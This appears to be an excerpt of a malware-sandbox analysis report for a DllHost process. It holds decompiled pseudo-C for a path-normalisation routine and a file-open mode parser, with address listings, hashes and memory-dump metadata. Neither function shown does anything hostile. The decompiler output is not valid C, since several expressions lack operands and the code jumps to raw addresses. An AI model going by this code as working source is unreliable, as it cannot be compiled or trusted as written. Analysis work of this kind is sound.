                                                                                                                                                              			E00007FF77FF7191C90F0(void* __esi, long long __rbx, long long __rcx, void* __rdx, void* __r8) {
				void* __rsi;
				void* __rbp;
				void* _t87;
				void* _t105;
				signed long long _t167;
				signed long long _t168;
				long long _t174;
				short* _t180;
				short* _t185;
				void* _t190;
				void* _t191;
				void* _t192;
				long long _t198;
				void* _t201;
				void* _t202;
				intOrPtr* _t204;
				void* _t206;
				void* _t207;
				char* _t209;
				char* _t210;
				void* _t211;
				void* _t221;
				long long _t222;
				intOrPtr _t235;
				intOrPtr _t237;
				intOrPtr _t245;
				intOrPtr _t249;
				void* _t252;
				void* _t254;
				void* _t260;
				intOrPtr* _t261;
				void* _t263;
				intOrPtr _t264;
				intOrPtr _t265;
				intOrPtr _t271;
				void* _t275;
				intOrPtr _t276;
				long long _t277;
				void* _t278;
				void* _t283;
				void* _t284;
				intOrPtr _t287;
				void* _t292;
				void* _t294;
				signed long long _t295;
				void* _t316;
				intOrPtr _t317;
				intOrPtr _t318;
				void* _t320;
				void* _t323;
				intOrPtr _t324;
				long long _t329;
				intOrPtr _t333;
				void* _t337;
				intOrPtr _t340;
				intOrPtr _t341;

				_t198 = __rbx;
				 *((long long*)(_t294 + 0x18)) = __rbx;
				_t295 = _t294 - 0x60;
				_t167 =  *0x192190a0; // 0x590452ce5669
				_t168 = _t167 ^ _t295;
				 *(_t295 + 0x50) = _t168;
				_t261 = __rcx;
				 *((long long*)(_t295 + 0x28)) = __rcx;
				 *(_t295 + 0x20) = 0;
				E00007FF77FF7191B9E00(_t168, __rbx, __rcx, __rdx, _t263);
				r12d = 1;
				 *(_t295 + 0x20) = r12d;
				_t6 = _t261 + 0x10; // 0x158e82024548d
				_t264 =  *_t6;
				if (_t264 == 0) goto 0x191c9172;
				_t7 = _t261 + 0x18; // 0x24548b48d8b60f00
				_t245 =  *_t7;
				if (_t245 - 0x10 < 0) goto 0x191c9150;
				if ( *((char*)( *_t261 + _t168)) != 0x5c) goto 0x191c9166;
				if (_t245 - 0x10 < 0) goto 0x191c9162;
				 *((char*)( *_t261 + _t168)) = 0x2f;
				if (_t168 + 1 - _t264 < 0) goto 0x191c9140;
				_t10 = _t261 + 0x10; // 0x158e82024548d
				_t265 =  *_t10;
				_t284 =  <  ? _t265 : _t283;
				_t11 = _t261 + 0x18; // 0x24548b48d8b60f00
				_t324 =  *_t11;
				if (_t324 - 0x10 < 0) goto 0x191c919a;
				_t299 =  >  ? _t245 : _t284;
				if (E00007FF77FF7191D4280(_t87,  *_t261, 0x191f9bc8,  >  ? _t245 : _t284) != 0) goto 0x191c938c;
				_t105 = _t284 - 2;
				if (_t105 >= 0) goto 0x191c91c6;
				goto 0x191c91cb;
				if ((0 | _t105 > 0x00000000) != 0) goto 0x191c938c;
				 *((long long*)(_t295 + 0x30)) = _t198;
				 *((long long*)(_t295 + 0x48)) = 0xf;
				if (_t265 - 2 < 0) goto 0x191c9655;
				_t16 = _t265 - 2; // 0x158e82024548b
				_t286 =  <  ? _t16 : 0xffffffff;
				if (_t324 - 0x10 < 0) goto 0x191c9209;
				if (0xffffffff - 0xf > 0) goto 0x191c923c;
				 *((long long*)(_t295 + 0x40)) = 0xffffffff;
				E00007FF77FF7191D4380();
				 *((char*)(_t295 + 0x2f)) = 0;
				goto 0x191c92da;
				if (0xffffffff - 0xffffffff > 0) goto 0x191c9667;
				if (0xffffffffffffffff - 0xffffffff <= 0) goto 0x191c9260;
				goto 0x191c9287;
				_t24 = ( <  ? 0x27 : 0xffffffff) + 1; // 0x100000000
				_t221 = _t24;
				if (_t221 - 0x1000 < 0) goto 0x191c92a6;
				_t25 = _t221 + 0x27; // 0x100000027
				_t174 = _t25;
				if (_t174 - _t221 <= 0) goto 0x191c965b;
				_t222 = _t174;
				E00007FF77FF7191D23D8(_t174, _t222);
				if (_t174 == 0) goto 0x191c9661;
				_t26 = _t174 + 0x27; // 0x27
				 *((long long*)((_t26 & 0xffffffe0) - 8)) = _t174;
				goto 0x191c92b8;
				if (_t222 == 0) goto 0x191c92b5;
				E00007FF77FF7191D23D8(_t174, _t222);
				goto 0x191c92b8;
				_t329 = _t198;
				 *((long long*)(_t295 + 0x40)) = 0xffffffff;
				 *((long long*)(_t295 + 0x48)) =  <  ? 0x27 : 0xffffffff;
				E00007FF77FF7191D4380();
				 *((char*)(_t329 + ( <  ? _t16 : 0xffffffff))) = 0;
				 *((long long*)(_t295 + 0x30)) = _t329;
				r12d = r12d | 0x00000002;
				 *(_t295 + 0x20) = r12d;
				if (_t261 == _t295 + 0x30) goto 0x191c934c;
				_t34 = _t261 + 0x18; // 0x24548b48d8b60f00
				_t249 =  *_t34;
				if (_t249 - 0x10 < 0) goto 0x191c9327;
				if (_t249 + 1 - 0x1000 < 0) goto 0x191c9322;
				if ( *_t261 -  *((intOrPtr*)( *_t261 - 8)) - 8 - 0x1f > 0) goto 0x191c9661;
				0x191d23d0(_t337, _t323, _t320, _t316, _t260, _t263, _t283);
				 *((long long*)(_t261 + 0x18)) = 0xf;
				 *_t261 = 0;
				asm("movups xmm0, [esp+0x30]");
				asm("movups [edi], xmm0");
				asm("movups xmm1, [esp+0x40]");
				asm("movups [edi+0x10], xmm1");
				_t38 = _t261 + 0x10; // 0x158e82024548d
				_t271 =  *_t38;
				goto 0x191c917c;
				if (_t271 - 0x10 < 0) goto 0x191c9383;
				_t39 = _t271 + 1; // 0x100000000
				_t252 = _t39;
				if (_t252 - 0x1000 < 0) goto 0x191c937b;
				if (_t329 -  *((intOrPtr*)(_t329 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c9661;
				0x191d23d0();
				_t41 = _t261 + 0x10; // 0x158e82024548d
				goto 0x191c917c;
				_t42 = _t261 + 0x18; // 0x24548b48d8b60f00
				_t317 =  *_t42;
				if (_t317 - 0x10 < 0) goto 0x191c93a1;
				_t340 =  *_t261;
				_t43 = _t261 + 0x10; // 0x158e82024548d
				_t287 =  *_t43;
				if (_t287 - 2 < 0) goto 0x191c9442;
				_t44 = _t287 - 2; // 0x158e82024548b
				_t180 = _t44;
				if ( *_t41 - _t180 > 0) goto 0x191c9442;
				_t47 = _t340 + _t287 - 1; // 0x24548b48d8b60eff
				E00007FF77FF7191D4BD0(0x2f, _t340 +  *_t41, _t47 - _t340 +  *_t41);
				if (_t180 == 0) goto 0x191c9442;
				if ( *_t180 == 0x2f2f) goto 0x191c93f3;
				goto 0x191c93cb;
				_t275 = _t180 + 1 - _t340;
				if (_t275 == 0xffffffff) goto 0x191c9442;
				if (_t287 - _t275 < 0) goto 0x191c9655;
				_t254 =  <  ? _t287 - _t275 : _t252 + 0x27;
				if (_t317 - 0x10 < 0) goto 0x191c9423;
				 *((long long*)(_t261 + 0x10)) = _t287 - _t254;
				E00007FF77FF7191D4380();
				goto 0x191c9391;
				_t52 = _t261 + 0x18; // 0x24548b48d8b60f00
				_t341 =  *_t52;
				if (_t341 - 0x10 < 0) goto 0x191c9452;
				_t333 =  *_t261;
				_t53 = _t261 + 0x10; // 0x158e82024548d
				_t276 =  *_t53;
				if (_t276 - 3 < 0) goto 0x191c94f9;
				_t54 = _t276 - 3; // 0x158e82024548a
				_t185 = _t54;
				if (_t198 - _t185 > 0) goto 0x191c94f9;
				_t57 = _t276 + _t333 - 2; // 0x158e82024548b
				E00007FF77FF7191D4BD0(0x2f, _t333 + _t198, _t57 - _t333 + _t198);
				if (_t185 == 0) goto 0x191c94f9;
				if ( *_t185 != 0x2e2f) goto 0x191c949b;
				if ( *((char*)(_t185 + 2)) == 0x2f) goto 0x191c94aa;
				goto 0x191c947c;
				_t201 = _t185 + 1 - _t333;
				if (_t201 == 0xffffffff) goto 0x191c94f9;
				if (_t276 - _t201 < 0) goto 0x191c9655;
				_t256 =  <  ? _t276 - _t201 : _t254 +  *_t261 + _t275;
				if (_t341 - 0x10 < 0) goto 0x191c94da;
				_t277 = _t276 - ( <  ? _t276 - _t201 : _t254 +  *_t261 + _t275);
				 *((long long*)(_t261 + 0x10)) = _t277;
				_t278 = _t277 - _t201;
				E00007FF77FF7191D4380();
				goto 0x191c9442;
				r13d = 4;
				_t202 = _t278;
				_t190 = _t278;
				_t63 = _t261 + 0x18; // 0x24548b48d8b60f00
				_t318 =  *_t63;
				if (_t318 - 0x10 < 0) goto 0x191c9515;
				_t235 =  *_t261;
				if (_t190 - 0xffffffff < 0) goto 0x191c962d;
				_t191 = _t190 + 0xfffffffc;
				_t203 =  <  ? _t191 : _t202;
				_t204 = ( <  ? _t191 : _t202) + _t235;
				if ( *_t204 != 0x2f) goto 0x191c953d;
				if ( *_t204 == 0x2f2e2e2f) goto 0x191c954b;
				if (_t204 == _t235) goto 0x191c962d;
				goto 0x191c9530;
				_t206 = _t204 - 1 - _t235;
				if (_t206 == 0xffffffff) goto 0x191c962d;
				if (_t318 - 0x10 < 0) goto 0x191c9567;
				_t237 =  *_t261;
				_t207 = _t206 - 1;
				if (_t278 == 0) goto 0x191c962d;
				_t64 = _t278 - 1; // 0x158e82024548c
				_t192 = _t64;
				_t208 =  <  ? _t192 : _t207;
				_t209 = ( <  ? _t192 : _t207) + _t237;
				if ( *_t209 == 0x2f) goto 0x191c9597;
				if (_t209 == _t237) goto 0x191c962d;
				_t210 = _t209 - 1;
				if ( *_t210 != 0x2f) goto 0x191c9586;
				_t211 = _t210 - _t237;
				if (_t211 == 0xffffffff) goto 0x191c962d;
				if (_t278 - _t211 < 0) goto 0x191c9655;
				_t292 = _t278 - _t211;
				_t335 =  <  ? _t292 : 0xffffffff;
				if (_t318 - 0x10 < 0) goto 0x191c95c9;
				_t314 =  >  ? 0xffffffff : 0xffffffff;
				if (E00007FF77FF7191D4280(_t87, _t211 +  *_t261, 0x191f9bcc,  >  ? 0xffffffff : 0xffffffff) != 0) goto 0x191c95f0;
				_t163 = ( <  ? _t292 : 0xffffffff) - 0xffffffff;
				if (( <  ? _t292 : 0xffffffff) == 0xffffffff) goto 0x191c9502;
				_t66 = _t206 - _t211 + 3; // 0x158e82024548f
				_t196 =  <  ? _t292 : _t66;
				if (_t318 - 0x10 < 0) goto 0x191c960a;
				_t279 = _t278 - ( <  ? _t292 : _t66);
				 *((long long*)(_t261 + 0x10)) = _t278 - ( <  ? _t292 : _t66);
				E00007FF77FF7191D4380();
				goto 0x191c94ff;
				return E00007FF77FF7191D23B0(_t84, _t87,  *(_t295 + 0x50) ^ _t295);
			}



























































                                                                                                                                                              0x7ff7191c90f0
                                                                                                                                                              0x7ff7191c90f0
                                                                                                                                                              0x7ff7191c9100
                                                                                                                                                              0x7ff7191c9104
                                                                                                                                                              0x7ff7191c910b
                                                                                                                                                              0x7ff7191c910e
                                                                                                                                                              0x7ff7191c9113
                                                                                                                                                              0x7ff7191c9116
                                                                                                                                                              0x7ff7191c911d
                                                                                                                                                              0x7ff7191c9121
                                                                                                                                                              0x7ff7191c9126
                                                                                                                                                              0x7ff7191c912c
                                                                                                                                                              0x7ff7191c9131
                                                                                                                                                              0x7ff7191c9131
                                                                                                                                                              0x7ff7191c913a
                                                                                                                                                              0x7ff7191c9143
                                                                                                                                                              0x7ff7191c9143
                                                                                                                                                              0x7ff7191c914b
                                                                                                                                                              0x7ff7191c9154
                                                                                                                                                              0x7ff7191c915d
                                                                                                                                                              0x7ff7191c9162
                                                                                                                                                              0x7ff7191c916c
                                                                                                                                                              0x7ff7191c916e
                                                                                                                                                              0x7ff7191c916e
                                                                                                                                                              0x7ff7191c9186
                                                                                                                                                              0x7ff7191c918d
                                                                                                                                                              0x7ff7191c918d
                                                                                                                                                              0x7ff7191c9195
                                                                                                                                                              0x7ff7191c91a1
                                                                                                                                                              0x7ff7191c91b3
                                                                                                                                                              0x7ff7191c91b9
                                                                                                                                                              0x7ff7191c91bd
                                                                                                                                                              0x7ff7191c91c4
                                                                                                                                                              0x7ff7191c91cd
                                                                                                                                                              0x7ff7191c91d3
                                                                                                                                                              0x7ff7191c91d8
                                                                                                                                                              0x7ff7191c91e5
                                                                                                                                                              0x7ff7191c91eb
                                                                                                                                                              0x7ff7191c91f9
                                                                                                                                                              0x7ff7191c9204
                                                                                                                                                              0x7ff7191c9211
                                                                                                                                                              0x7ff7191c9213
                                                                                                                                                              0x7ff7191c9223
                                                                                                                                                              0x7ff7191c9228
                                                                                                                                                              0x7ff7191c9237
                                                                                                                                                              0x7ff7191c923f
                                                                                                                                                              0x7ff7191c924f
                                                                                                                                                              0x7ff7191c925e
                                                                                                                                                              0x7ff7191c926d
                                                                                                                                                              0x7ff7191c926d
                                                                                                                                                              0x7ff7191c9278
                                                                                                                                                              0x7ff7191c927a
                                                                                                                                                              0x7ff7191c927a
                                                                                                                                                              0x7ff7191c9281
                                                                                                                                                              0x7ff7191c9287
                                                                                                                                                              0x7ff7191c928a
                                                                                                                                                              0x7ff7191c9292
                                                                                                                                                              0x7ff7191c9298
                                                                                                                                                              0x7ff7191c92a0
                                                                                                                                                              0x7ff7191c92a4
                                                                                                                                                              0x7ff7191c92a9
                                                                                                                                                              0x7ff7191c92ab
                                                                                                                                                              0x7ff7191c92b3
                                                                                                                                                              0x7ff7191c92b5
                                                                                                                                                              0x7ff7191c92b8
                                                                                                                                                              0x7ff7191c92bd
                                                                                                                                                              0x7ff7191c92cb
                                                                                                                                                              0x7ff7191c92d0
                                                                                                                                                              0x7ff7191c92d5
                                                                                                                                                              0x7ff7191c92da
                                                                                                                                                              0x7ff7191c92de
                                                                                                                                                              0x7ff7191c92eb
                                                                                                                                                              0x7ff7191c92ed
                                                                                                                                                              0x7ff7191c92ed
                                                                                                                                                              0x7ff7191c92f5
                                                                                                                                                              0x7ff7191c9304
                                                                                                                                                              0x7ff7191c9319
                                                                                                                                                              0x7ff7191c9322
                                                                                                                                                              0x7ff7191c9327
                                                                                                                                                              0x7ff7191c932f
                                                                                                                                                              0x7ff7191c9332
                                                                                                                                                              0x7ff7191c9337
                                                                                                                                                              0x7ff7191c933a
                                                                                                                                                              0x7ff7191c933f
                                                                                                                                                              0x7ff7191c9343
                                                                                                                                                              0x7ff7191c9343
                                                                                                                                                              0x7ff7191c9347
                                                                                                                                                              0x7ff7191c9350
                                                                                                                                                              0x7ff7191c9352
                                                                                                                                                              0x7ff7191c9352
                                                                                                                                                              0x7ff7191c9360
                                                                                                                                                              0x7ff7191c9375
                                                                                                                                                              0x7ff7191c937e
                                                                                                                                                              0x7ff7191c9383
                                                                                                                                                              0x7ff7191c9387
                                                                                                                                                              0x7ff7191c9394
                                                                                                                                                              0x7ff7191c9394
                                                                                                                                                              0x7ff7191c939c
                                                                                                                                                              0x7ff7191c939e
                                                                                                                                                              0x7ff7191c93a1
                                                                                                                                                              0x7ff7191c93a1
                                                                                                                                                              0x7ff7191c93a9
                                                                                                                                                              0x7ff7191c93af
                                                                                                                                                              0x7ff7191c93af
                                                                                                                                                              0x7ff7191c93b6
                                                                                                                                                              0x7ff7191c93c4
                                                                                                                                                              0x7ff7191c93d0
                                                                                                                                                              0x7ff7191c93db
                                                                                                                                                              0x7ff7191c93e2
                                                                                                                                                              0x7ff7191c93f1
                                                                                                                                                              0x7ff7191c93f3
                                                                                                                                                              0x7ff7191c93fa
                                                                                                                                                              0x7ff7191c93ff
                                                                                                                                                              0x7ff7191c9413
                                                                                                                                                              0x7ff7191c941e
                                                                                                                                                              0x7ff7191c942a
                                                                                                                                                              0x7ff7191c9438
                                                                                                                                                              0x7ff7191c943d
                                                                                                                                                              0x7ff7191c9445
                                                                                                                                                              0x7ff7191c9445
                                                                                                                                                              0x7ff7191c944d
                                                                                                                                                              0x7ff7191c944f
                                                                                                                                                              0x7ff7191c9452
                                                                                                                                                              0x7ff7191c9452
                                                                                                                                                              0x7ff7191c945a
                                                                                                                                                              0x7ff7191c9460
                                                                                                                                                              0x7ff7191c9460
                                                                                                                                                              0x7ff7191c9467
                                                                                                                                                              0x7ff7191c9475
                                                                                                                                                              0x7ff7191c9481
                                                                                                                                                              0x7ff7191c948c
                                                                                                                                                              0x7ff7191c9493
                                                                                                                                                              0x7ff7191c9499
                                                                                                                                                              0x7ff7191c94a8
                                                                                                                                                              0x7ff7191c94aa
                                                                                                                                                              0x7ff7191c94b1
                                                                                                                                                              0x7ff7191c94b6
                                                                                                                                                              0x7ff7191c94ca
                                                                                                                                                              0x7ff7191c94d5
                                                                                                                                                              0x7ff7191c94de
                                                                                                                                                              0x7ff7191c94e1
                                                                                                                                                              0x7ff7191c94e5
                                                                                                                                                              0x7ff7191c94ef
                                                                                                                                                              0x7ff7191c94f4
                                                                                                                                                              0x7ff7191c94f9
                                                                                                                                                              0x7ff7191c94ff
                                                                                                                                                              0x7ff7191c9502
                                                                                                                                                              0x7ff7191c9508
                                                                                                                                                              0x7ff7191c9508
                                                                                                                                                              0x7ff7191c9510
                                                                                                                                                              0x7ff7191c9512
                                                                                                                                                              0x7ff7191c9518
                                                                                                                                                              0x7ff7191c951e
                                                                                                                                                              0x7ff7191c9525
                                                                                                                                                              0x7ff7191c9529
                                                                                                                                                              0x7ff7191c9533
                                                                                                                                                              0x7ff7191c953b
                                                                                                                                                              0x7ff7191c9540
                                                                                                                                                              0x7ff7191c9549
                                                                                                                                                              0x7ff7191c954b
                                                                                                                                                              0x7ff7191c9555
                                                                                                                                                              0x7ff7191c9562
                                                                                                                                                              0x7ff7191c9564
                                                                                                                                                              0x7ff7191c9567
                                                                                                                                                              0x7ff7191c956d
                                                                                                                                                              0x7ff7191c9573
                                                                                                                                                              0x7ff7191c9573
                                                                                                                                                              0x7ff7191c957a
                                                                                                                                                              0x7ff7191c957e
                                                                                                                                                              0x7ff7191c9584
                                                                                                                                                              0x7ff7191c9589
                                                                                                                                                              0x7ff7191c958f
                                                                                                                                                              0x7ff7191c9595
                                                                                                                                                              0x7ff7191c9597
                                                                                                                                                              0x7ff7191c959e
                                                                                                                                                              0x7ff7191c95a7
                                                                                                                                                              0x7ff7191c95b0
                                                                                                                                                              0x7ff7191c95b9
                                                                                                                                                              0x7ff7191c95c4
                                                                                                                                                              0x7ff7191c95cf
                                                                                                                                                              0x7ff7191c95e5
                                                                                                                                                              0x7ff7191c95e7
                                                                                                                                                              0x7ff7191c95ea
                                                                                                                                                              0x7ff7191c95f3
                                                                                                                                                              0x7ff7191c95fa
                                                                                                                                                              0x7ff7191c9605
                                                                                                                                                              0x7ff7191c960d
                                                                                                                                                              0x7ff7191c9610
                                                                                                                                                              0x7ff7191c961f
                                                                                                                                                              0x7ff7191c9628
                                                                                                                                                              0x7ff7191c9654

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: /../$/../
                                                                                                                                                              • API String ID: 73155330-1624290729
                                                                                                                                                              • Opcode ID: 197f9f369e68944a8684af41371c70330e5d9e23c9a10c4d3fdbba5d1436fc02
                                                                                                                                                              • Instruction ID: a34a970aa53f8f169fd07eddb43bca83e926bf612bce0a75de6087c31abb0cf6
                                                                                                                                                              • Opcode Fuzzy Hash: 197f9f369e68944a8684af41371c70330e5d9e23c9a10c4d3fdbba5d1436fc02
                                                                                                                                                              • Instruction Fuzzy Hash: 72E1DA31B28E9295FA14AE15E5082B9A372AB04BF8FC44631DA6D077C5DF7CE4DB9310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191EB2AC Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E00007FF77FF7191EB2AC(signed int __rax, long long __rbx, signed int* __rcx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t25;
				intOrPtr _t27;
				signed int _t30;
				intOrPtr _t43;
				char _t50;
				void* _t55;
				void* _t75;
				signed int _t81;
				void* _t82;
				signed int _t86;
				intOrPtr* _t102;
				intOrPtr* _t121;
				intOrPtr* _t123;
				char* _t124;
				intOrPtr* _t131;
				char* _t132;
				void* _t133;

				_t102 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				 *__rcx = __rax;
				__rcx[2] = 0;
				_t25 =  *0x1921b6f0; // 0x0
				__rcx[1] = _t25;
				goto 0x191eb2dc;
				_t131 = __rdx + 1;
				_t27 =  *_t131;
				if (_t27 == 0x20) goto 0x191eb2d6;
				if (_t27 == 0x61) goto 0x191eb309;
				if (_t27 == 0x72) goto 0x191eb2fd;
				if (_t27 != 0x77) goto 0x191eb54a;
				 *__rcx = 0x301;
				goto 0x191eb30f;
				 *__rcx =  *__rcx & 0x00000000;
				__rcx[1] = 1;
				goto 0x191eb312;
				 *__rcx = 0x109;
				__rcx[1] = 2;
				_t132 = _t131 + 1;
				r9b = 0;
				dil = 0;
				r10b = 0;
				r11b = 0;
				if ( *_t132 == 0) goto 0x191eb46f;
				_t50 =  *_t132;
				_t75 = _t50 - 0x53;
				if (_t75 > 0) goto 0x191eb3dd;
				if (_t75 == 0) goto 0x191eb3c6;
				if (_t75 == 0) goto 0x191eb45d;
				if (_t75 == 0) goto 0x191eb397;
				if (_t75 == 0) goto 0x191eb38f;
				if (_t75 == 0) goto 0x191eb37d;
				_t55 = _t50 - 0xfffffffffffffff2;
				if (_t75 == 0) goto 0x191eb374;
				if (_t55 != 4) goto 0x191eb54a;
				if (r10b != 0) goto 0x191eb451;
				 *__rcx =  *__rcx | 0x00000010;
				goto 0x191eb3d2;
				asm("bts dword [ebx], 0x7");
				goto 0x191eb45b;
				if (( *__rcx & 0x00000040) != 0) goto 0x191eb451;
				goto 0x191eb459;
				r11b = 1;
				goto 0x191eb451;
				if (dil != 0) goto 0x191eb451;
				_t30 =  *__rcx;
				dil = 1;
				if ((sil & _t30) != 0) goto 0x191eb451;
				 *__rcx = _t30 & 0xfffffffe | 0x00000002;
				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
				goto 0x191eb45b;
				_t81 = r10b;
				if (_t81 != 0) goto 0x191eb451;
				 *__rcx =  *__rcx | 0x00000020;
				r10b = 1;
				goto 0x191eb45d;
				if (_t81 == 0) goto 0x191eb449;
				if (_t81 == 0) goto 0x191eb43a;
				if (_t81 == 0) goto 0x191eb428;
				if (_t81 == 0) goto 0x191eb41c;
				if (_t81 == 0) goto 0x191eb40d;
				_t82 = _t55 - 0x34 - 4;
				if (_t82 != 0) goto 0x191eb54a;
				asm("bt eax, 0x9");
				if (_t82 >= 0) goto 0x191eb451;
				asm("bts eax, 0xa");
				goto 0x191eb459;
				if (( *__rcx & 0x0000c000) != 0) goto 0x191eb451;
				asm("bts eax, 0xe");
				goto 0x191eb459;
				if (r9b != 0) goto 0x191eb451;
				asm("btr dword [ebx+0x4], 0xb");
				goto 0x191eb432;
				if (r9b != 0) goto 0x191eb451;
				asm("bts dword [ebx+0x4], 0xb");
				r9b = 1;
				goto 0x191eb45d;
				_t86 =  *__rcx & 0x0000c000;
				if (_t86 != 0) goto 0x191eb451;
				asm("bts eax, 0xf");
				goto 0x191eb459;
				asm("bt eax, 0xc");
				if (_t86 >= 0) goto 0x191eb455;
				goto 0x191eb45d;
				asm("bts eax, 0xc");
				_t133 = _t132 + __rax;
				if (1 != 0) goto 0x191eb323;
				_t120 =  ==  ? _t133 : _t133 + 1;
				goto 0x191eb47f;
				_t121 = ( ==  ? _t133 : _t133 + 1) + 1;
				if ( *_t121 == 0x20) goto 0x191eb47c;
				if (r11b != 0) goto 0x191eb49b;
				if ( *_t121 != r11b) goto 0x191eb54a;
				__rcx[2] = 1;
				goto 0x191eb55a;
				r8d = 3;
				if (E00007FF77FF7191E4F20(_t55 - 0x34, _t121, 0x192081f0, _t133) != 0) goto 0x191eb54a;
				goto 0x191eb4c1;
				_t123 = _t121 + 4;
				_t43 =  *_t123;
				if (_t43 == 0x20) goto 0x191eb4be;
				if (_t43 != 0x3d) goto 0x191eb54a;
				_t124 = _t123 + 1;
				if ( *_t124 == 0x20) goto 0x191eb4cb;
				r8d = 5;
				if (E00007FF77FF7191F3790(_t102, _t124) != 0) goto 0x191eb4f4;
				asm("bts dword [ebx], 0x12");
				goto 0x191eb534;
				r8d = 8;
				if (E00007FF77FF7191F3790(_t102, _t124) != 0) goto 0x191eb515;
				asm("bts dword [ebx], 0x11");
				goto 0x191eb534;
				r8d = 7;
				if (E00007FF77FF7191F3790(_t102, _t124) != 0) goto 0x191eb54a;
				asm("bts dword [ebx], 0x10");
				goto 0x191eb53d;
				if ( *((intOrPtr*)(_t124 + __rsi + 1)) == 0x20) goto 0x191eb53a;
				goto 0x191eb48c;
				E00007FF77FF7191DC854(_t102);
				 *_t102 = 0x16;
				return E00007FF77FF7191DA5D8();
			}




















                                                                                                                                                              0x7ff7191eb2ac
                                                                                                                                                              0x7ff7191eb2ac
                                                                                                                                                              0x7ff7191eb2b1
                                                                                                                                                              0x7ff7191eb2c0
                                                                                                                                                              0x7ff7191eb2c6
                                                                                                                                                              0x7ff7191eb2c9
                                                                                                                                                              0x7ff7191eb2cf
                                                                                                                                                              0x7ff7191eb2d4
                                                                                                                                                              0x7ff7191eb2d6
                                                                                                                                                              0x7ff7191eb2d9
                                                                                                                                                              0x7ff7191eb2de
                                                                                                                                                              0x7ff7191eb2e7
                                                                                                                                                              0x7ff7191eb2eb
                                                                                                                                                              0x7ff7191eb2ef
                                                                                                                                                              0x7ff7191eb2f5
                                                                                                                                                              0x7ff7191eb2fb
                                                                                                                                                              0x7ff7191eb2fd
                                                                                                                                                              0x7ff7191eb300
                                                                                                                                                              0x7ff7191eb307
                                                                                                                                                              0x7ff7191eb309
                                                                                                                                                              0x7ff7191eb30f
                                                                                                                                                              0x7ff7191eb312
                                                                                                                                                              0x7ff7191eb315
                                                                                                                                                              0x7ff7191eb318
                                                                                                                                                              0x7ff7191eb31b
                                                                                                                                                              0x7ff7191eb31e
                                                                                                                                                              0x7ff7191eb327
                                                                                                                                                              0x7ff7191eb32d
                                                                                                                                                              0x7ff7191eb331
                                                                                                                                                              0x7ff7191eb334
                                                                                                                                                              0x7ff7191eb33a
                                                                                                                                                              0x7ff7191eb343
                                                                                                                                                              0x7ff7191eb34c
                                                                                                                                                              0x7ff7191eb351
                                                                                                                                                              0x7ff7191eb356
                                                                                                                                                              0x7ff7191eb358
                                                                                                                                                              0x7ff7191eb35b
                                                                                                                                                              0x7ff7191eb360
                                                                                                                                                              0x7ff7191eb369
                                                                                                                                                              0x7ff7191eb36f
                                                                                                                                                              0x7ff7191eb372
                                                                                                                                                              0x7ff7191eb374
                                                                                                                                                              0x7ff7191eb378
                                                                                                                                                              0x7ff7191eb381
                                                                                                                                                              0x7ff7191eb38a
                                                                                                                                                              0x7ff7191eb38f
                                                                                                                                                              0x7ff7191eb392
                                                                                                                                                              0x7ff7191eb39a
                                                                                                                                                              0x7ff7191eb3a0
                                                                                                                                                              0x7ff7191eb3a2
                                                                                                                                                              0x7ff7191eb3a8
                                                                                                                                                              0x7ff7191eb3b3
                                                                                                                                                              0x7ff7191eb3be
                                                                                                                                                              0x7ff7191eb3c1
                                                                                                                                                              0x7ff7191eb3c6
                                                                                                                                                              0x7ff7191eb3c9
                                                                                                                                                              0x7ff7191eb3cf
                                                                                                                                                              0x7ff7191eb3d2
                                                                                                                                                              0x7ff7191eb3d8
                                                                                                                                                              0x7ff7191eb3e0
                                                                                                                                                              0x7ff7191eb3e5
                                                                                                                                                              0x7ff7191eb3ea
                                                                                                                                                              0x7ff7191eb3ef
                                                                                                                                                              0x7ff7191eb3f4
                                                                                                                                                              0x7ff7191eb3f6
                                                                                                                                                              0x7ff7191eb3f9
                                                                                                                                                              0x7ff7191eb401
                                                                                                                                                              0x7ff7191eb405
                                                                                                                                                              0x7ff7191eb407
                                                                                                                                                              0x7ff7191eb40b
                                                                                                                                                              0x7ff7191eb414
                                                                                                                                                              0x7ff7191eb416
                                                                                                                                                              0x7ff7191eb41a
                                                                                                                                                              0x7ff7191eb41f
                                                                                                                                                              0x7ff7191eb421
                                                                                                                                                              0x7ff7191eb426
                                                                                                                                                              0x7ff7191eb42b
                                                                                                                                                              0x7ff7191eb42d
                                                                                                                                                              0x7ff7191eb432
                                                                                                                                                              0x7ff7191eb438
                                                                                                                                                              0x7ff7191eb43c
                                                                                                                                                              0x7ff7191eb441
                                                                                                                                                              0x7ff7191eb443
                                                                                                                                                              0x7ff7191eb447
                                                                                                                                                              0x7ff7191eb44b
                                                                                                                                                              0x7ff7191eb44f
                                                                                                                                                              0x7ff7191eb453
                                                                                                                                                              0x7ff7191eb455
                                                                                                                                                              0x7ff7191eb464
                                                                                                                                                              0x7ff7191eb469
                                                                                                                                                              0x7ff7191eb476
                                                                                                                                                              0x7ff7191eb47a
                                                                                                                                                              0x7ff7191eb47c
                                                                                                                                                              0x7ff7191eb482
                                                                                                                                                              0x7ff7191eb487
                                                                                                                                                              0x7ff7191eb48c
